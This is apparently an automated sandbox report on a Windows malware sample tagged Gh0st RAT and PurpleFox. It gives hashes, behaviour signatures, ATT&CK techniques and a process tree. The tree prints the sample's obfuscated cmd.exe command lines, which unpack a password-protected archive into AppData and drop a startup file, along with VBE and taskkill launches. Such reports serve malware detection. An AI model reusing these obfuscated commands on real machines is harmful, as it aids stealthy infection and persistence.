Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2022 21:13

General

  • Target

    c95bfa90e6d944194b787fc2bea69f1c5bf8e6acb2968442b1e132373d981306.exe

  • Size

    28KB

  • MD5

    2609d2fe1548df223db36557c0da7be9

  • SHA1

    04ed4ab181abf1fe593d861a3a80e81890b55182

  • SHA256

    c95bfa90e6d944194b787fc2bea69f1c5bf8e6acb2968442b1e132373d981306

  • SHA512

    9f71824a85c4cdc7fefde91f797bf7017ec648726e82a009c52334ab2aa5c6b6209fbfb2d677439d3674383e9755aedfedbb566acdb6f793d18105ec00b9b715

  • SSDEEP

    192:XpVH9RnW5JKaEVDVE4WMdb9EVRhoynQLdgH9C2tNVRmd8MFA93M3pkR:XEo9WMdb9khumdC2tNVwd5ASc

Malware Config

Signatures

  • Detect PurpleFox Rootkit 2 IoCs

    Detect PurpleFox Rootkit.

  • Gh0st RAT payload 2 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • UAC bypass 3 TTPs 3 IoCs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 2 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c95bfa90e6d944194b787fc2bea69f1c5bf8e6acb2968442b1e132373d981306.exe
    "C:\Users\Admin\AppData\Local\Temp\c95bfa90e6d944194b787fc2bea69f1c5bf8e6acb2968442b1e132373d981306.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1984
    • C:\Users\Public\Documents\k4.exe
      C:/Users/Public/Documents/k4.exe
      2⤵
      • Executes dropped EXE
      PID:3412
    • C:\Users\Public\Documents\k4.exe
      C:/Users/Public/Documents/k4.exe /D
      2⤵
      • Executes dropped EXE
      PID:2380
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /t /im k4.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1588
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im k4.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2164
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Public\Documents\2022060125.vbe
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4460
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\2022060125.vbe"
        3⤵
          PID:4968
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sch.vbe"
        2⤵
          PID:2276
        • C:\Users\Public\Documents\k4.exe
          "C:\Users\Public\Documents\k4.exe" /E
          2⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of AdjustPrivilegeToken
          PID:456
      • C:\Windows\system32\mmc.exe
        C:\Windows\system32\mmc.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3904
        • C:\Users\Public\Documents\dllhosts.exe
          "C:\Users\Public\Documents\dllhosts.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3888
          • C:\Users\Public\Documents\dllhosts.exe
            C:\Users\Public\Documents\dllhosts.exe
            3⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3172
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 240
            3⤵
            • Program crash
            PID:1576
      • C:\Windows\system32\mmc.exe
        C:\Windows\system32\mmc.exe -Embedding
        1⤵
        • Suspicious behavior: SetClipboardViewer
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\WINDOWS\system32\cmd.exe
          "C:\WINDOWS\system32\cmd.exe" /c ^c^M^D, , /v^:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"|,%pubLic:~ 14%MD,
          2⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Windows\system32\cmd.exe
            cMD , , /v:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"
            3⤵
            • An obfuscated cmd.exe command-line is typically used to evade detection.
            PID:4060
          • C:\Windows\system32\cmd.exe
            cMD ,
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3912
            • C:\Windows\system32\cmd.exe
              cmd /c C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4408
              • C:\Users\Public\Documents\unzip.exe
                C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"
                5⤵
                • Executes dropped EXE
                • Drops startup file
                PID:4832
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3888 -ip 3888
        1⤵
          PID:3728

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Privilege Escalation

        Bypass User Account Control

        1
        T1088

        Defense Evasion

        Bypass User Account Control

        1
        T1088

        Disabling Security Tools

        1
        T1089

        Modify Registry

        2
        T1112

        Discovery

        Query Registry

        4
        T1012

        System Information Discovery

        6
        T1082

        Peripheral Device Discovery

        2
        T1120

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Public\Documents\2022060125.vbe
          Filesize

          180B

          MD5

          d66c7e77096d4f4c406170b6ca0ad123

          SHA1

          9bb461061c7276ebe2a493f690d72263c0da8962

          SHA256

          cd0a0ac1315f1f473f4a42bed62fad7033fe68a3e0cf72a7b354a7e3dd78e8a8

          SHA512

          015788021b53eb278be1238b26a01499dcb809d93ee747bc89208f8d3570a7b0b813c70ea054e70584b536da4811f0a58ef38c96a984e6b3a54654774e5c7592

        • C:\Users\Public\Documents\RDSv1.dll
          Filesize

          35KB

          MD5

          9a152fabf313fd30018b40a63d86f449

          SHA1

          6a62ea32e43064ea0151f44f7237401aba836b39

          SHA256

          70211052fcbc051d0a308aef6186ec15a54a14d01cb60beadebf5d6a2864eac8

          SHA512

          720a73bdf3bd23c45154bcc8da55fc086b79510a122cda7eb71cfab92b54592f124f101b4ab1b0759a90429d620eec938a83b3c7e800a7878d61688cdd7158c2

        • C:\Users\Public\Documents\TASLoginBase.dll
          Filesize

          796KB

          MD5

          04444cd0407f13d7d3f145e4c6940854

          SHA1

          a6c1edf350101fa6914fca23a8aa04014be4f303

          SHA256

          23713fef2905e5e55223ea43e8794835ac57cbc3527277ac75c9a3dd2dc88c37

          SHA512

          0a4dca83b594975f97716ee5c57a65ee03278f661a7dc2d8cbc6b864888fe1c2f55d5048a4e115dff18cff1414a36ee5750ef80f219cf3acf5ce8e77f5d62877

        • C:\Users\Public\Documents\TASLoginBase.dll
          Filesize

          796KB

          MD5

          04444cd0407f13d7d3f145e4c6940854

          SHA1

          a6c1edf350101fa6914fca23a8aa04014be4f303

          SHA256

          23713fef2905e5e55223ea43e8794835ac57cbc3527277ac75c9a3dd2dc88c37

          SHA512

          0a4dca83b594975f97716ee5c57a65ee03278f661a7dc2d8cbc6b864888fe1c2f55d5048a4e115dff18cff1414a36ee5750ef80f219cf3acf5ce8e77f5d62877

        • C:\Users\Public\Documents\dllhosts.exe
          Filesize

          411KB

          MD5

          66557b2bd93e70a2804e983b279ab473

          SHA1

          4e58505689fd9643b5011880ce94b22cbfadf917

          SHA256

          a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31

          SHA512

          b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4

        • C:\Users\Public\Documents\dllhosts.exe
          Filesize

          411KB

          MD5

          66557b2bd93e70a2804e983b279ab473

          SHA1

          4e58505689fd9643b5011880ce94b22cbfadf917

          SHA256

          a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31

          SHA512

          b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4

        • C:\Users\Public\Documents\dllhosts.exe
          Filesize

          411KB

          MD5

          66557b2bd93e70a2804e983b279ab473

          SHA1

          4e58505689fd9643b5011880ce94b22cbfadf917

          SHA256

          a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31

          SHA512

          b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4

        • C:\Users\Public\Documents\k4.exe
          Filesize

          892KB

          MD5

          33e29221e2825001d32f78632217d250

          SHA1

          9122127fc91790a1edb78003e9b58a9b00355ed5

          SHA256

          65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

          SHA512

          01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

        • C:\Users\Public\Documents\k4.exe
          Filesize

          892KB

          MD5

          33e29221e2825001d32f78632217d250

          SHA1

          9122127fc91790a1edb78003e9b58a9b00355ed5

          SHA256

          65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

          SHA512

          01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

        • C:\Users\Public\Documents\k4.exe
          Filesize

          892KB

          MD5

          33e29221e2825001d32f78632217d250

          SHA1

          9122127fc91790a1edb78003e9b58a9b00355ed5

          SHA256

          65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

          SHA512

          01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

        • C:\Users\Public\Documents\k4.exe
          Filesize

          892KB

          MD5

          33e29221e2825001d32f78632217d250

          SHA1

          9122127fc91790a1edb78003e9b58a9b00355ed5

          SHA256

          65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

          SHA512

          01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

        • C:\Users\Public\Documents\sch.vbe
          Filesize

          179B

          MD5

          d569f44ce5792ee816b4182e3c7bc7da

          SHA1

          f16a402cd6030b5c7faa5c85ade3005d66d5232a

          SHA256

          59ff328647ccee11ad437e02b6e84c12511333553837b6fa270eefd21a3eccbf

          SHA512

          bb0f888ff00038d1787e6cce8b09b61761d93594cbfe08d2dbf650c1802938d6df7b4b854c1af97ad405fb3b1460aab339e636852d51dc6b6849d27a5af9560b

        • C:\Users\Public\Documents\unzip.dat
          Filesize

          1KB

          MD5

          e1fafb36f4da2c3be5dc9be1ad0b9805

          SHA1

          7d64a899e0ab62f3cd6ebf5bdade782c99c00713

          SHA256

          a862acb112f57458ad35e5e5fc90f0d270a7600af694a6b7052d161806e5dd69

          SHA512

          5c530b09b6459f34072dfccb7ccec5cbb791fc6cdc2633993da91fbef9c4d1172aec51ace3fb3cb8ac25b6721b4e6f5f1fd1a8fac7d95abbad8f6430e4abbc3e

        • C:\Users\Public\Documents\unzip.exe
          Filesize

          164KB

          MD5

          75375c22c72f1beb76bea39c22a1ed68

          SHA1

          e1652b058195db3f5f754b7ab430652ae04a50b8

          SHA256

          8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

          SHA512

          1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

        • C:\Users\Public\Documents\unzip.exe
          Filesize

          164KB

          MD5

          75375c22c72f1beb76bea39c22a1ed68

          SHA1

          e1652b058195db3f5f754b7ab430652ae04a50b8

          SHA256

          8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

          SHA512

          1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

        • C:\Users\Public\Documents\unzip.lnk
          Filesize

          2KB

          MD5

          7503a871168c07ca47a87c933f004f66

          SHA1

          764d09fe3b1f756a467e4a96d5cc3453732c3cfb

          SHA256

          8a3d404f5cdd1611433ea97e8a5ebf8696d8cdcf805331201a4fb4f7203023de

          SHA512

          4f7bbab0fcdb150cf368ab9fa2d23f26082ae1ac1d1a4cebc7ea9b2724125c7f5e013b2180a08a3f0002e416e6be5e6233f47fb7f5dbebd1b503f09a5ea24831

        • C:\Users\Public\Documents\update.lnk
          Filesize

          1KB

          MD5

          3af508a542bdfa6927737a2d91d74f40

          SHA1

          433f04e960f68ce05358af2d672a9b649de4e3ce

          SHA256

          e7e3e44142369b3a312005313f8569f2bcd45bcdc8ea9e141616654bcd090b60

          SHA512

          b35ad011ca3770c1a1e2a655a614e91ebd96ce29099969c727a69e77a390b91078512ce55883d7290e4dd46c5f04f0461b2833f568d23da1fc4d91ea4633d3bc

        • C:\Users\Public\Documents\update.log
          Filesize

          539KB

          MD5

          460bf7211a5a99f5d4b0d9219cb0f7cd

          SHA1

          75e077aed35431b2670f4db2647eef12b4666b44

          SHA256

          a0118b861305f981f12b6922f15cfe2d39cd2e55cbd22378d461c8aa314d826f

          SHA512

          5bd21eba6ecdde2ca637f6969486dc33fd868ae58d07dec42d2acaf22857df96d75964f45c0b44356941738c3f4c5c2a9e4e8fb4e110ec32bfbc9ac52d8a1c9c

        • memory/456-177-0x0000000000000000-mapping.dmp
        • memory/1588-138-0x0000000000000000-mapping.dmp
        • memory/1684-155-0x0000000000000000-mapping.dmp
        • memory/2164-139-0x0000000000000000-mapping.dmp
        • memory/2276-142-0x0000000000000000-mapping.dmp
        • memory/2380-136-0x0000000000000000-mapping.dmp
        • memory/3172-168-0x0000000000400000-0x0000000000547000-memory.dmp
          Filesize

          1.3MB

        • memory/3172-167-0x0000000000400000-0x0000000000547000-memory.dmp
          Filesize

          1.3MB

        • memory/3172-164-0x0000000000400000-0x0000000000547000-memory.dmp
          Filesize

          1.3MB

        • memory/3172-175-0x0000000000400000-0x0000000000547000-memory.dmp
          Filesize

          1.3MB

        • memory/3172-169-0x0000000010000000-0x000000001019F000-memory.dmp
          Filesize

          1.6MB

        • memory/3172-163-0x0000000000000000-mapping.dmp
        • memory/3412-133-0x0000000000000000-mapping.dmp
        • memory/3888-147-0x0000000000000000-mapping.dmp
        • memory/3888-152-0x0000000000400000-0x0000000000490000-memory.dmp
          Filesize

          576KB

        • memory/3888-153-0x0000000010000000-0x00000000101BE000-memory.dmp
          Filesize

          1.7MB

        • memory/3888-176-0x0000000010000000-0x00000000101BE000-memory.dmp
          Filesize

          1.7MB

        • memory/3912-157-0x0000000000000000-mapping.dmp
        • memory/4060-156-0x0000000000000000-mapping.dmp
        • memory/4408-158-0x0000000000000000-mapping.dmp
        • memory/4460-140-0x0000000000000000-mapping.dmp
        • memory/4832-159-0x0000000000000000-mapping.dmp
        • memory/4968-143-0x0000000000000000-mapping.dmp